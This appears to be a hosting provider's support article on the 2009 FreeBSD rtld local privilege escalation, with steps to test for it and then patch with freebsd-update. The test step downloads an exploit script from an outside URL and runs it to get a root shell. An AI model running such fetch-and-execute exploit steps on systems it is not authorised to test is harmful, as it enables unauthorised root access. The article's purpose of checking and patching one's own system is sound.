Background
On November 30 2009, a security vulnerability was discovered by Nikolaos Rangos (aka Kingcope) in recent FreeBSD releases exploting code in the run-time link-editor, rtld. A patch was shortly issued and updated binaries were announced December 3 2009 in FreeBSD security announcement FreeBSD-SA-09:16.rtld. This vulnerability is critical in nature as it allows a local user to get root access.
Test your system
If you are running 7.0, 7.1, 7.2 or 8.0 and have not applied updates before December 3 2009, your system is vulnerable. Here is how to test:
1. Login to your system as a user:
$ whoami
kevin
2. Make a temporary directory and download the exploit code:
$ mkdir ~/tmp ; cd ~/tmp ; fetch http://www.rootbsd.net/perm/37154.sh
3. Execute the exploit:
$ sh ./37154.sh
4. Now, if you see a "#" prompt this indicates you are root and you can confirm:
# whoami
5. exit out of the root shell before proceeding to the next steps:
# exit
Update your system
Now, use 'su' to gain root access if you haven't already. Your system can be updated using the freebsd-update utility. First, run:
# freebsd-update fetch
Sample output:
# freebsd-update fetch
Looking up update.FreeBSD.org mirrors... 3 mirrors found.
Fetching metadata signature for 7.2-RELEASE from update4.FreeBSD.org... done.
Fetching metadata index... done.
Inspecting system... done.
Preparing to download files... done.
The following files will be updated as part of updating to 7.2-RELEASE-p5:
/boot/kernel/if_bce.ko
/boot/kernel/if_bce.ko.symbols
/boot/kernel/if_fxp.ko
/boot/kernel/if_fxp.ko.symbols
/boot/kernel/kernel
/boot/kernel/kernel.symbols
/etc/mtree/BSD.var.dist
/lib/libc.so.7
<... truncated ...>
this will download the updates. Now, to apply them, run:
# freebsd-update
Sample output:
# freebsd-update install
Installing updates... done.
You can repeat the exploit test to confirm your system is not vulnerable now. If you need any help feel free to open a support ticket.
|
You are here: 
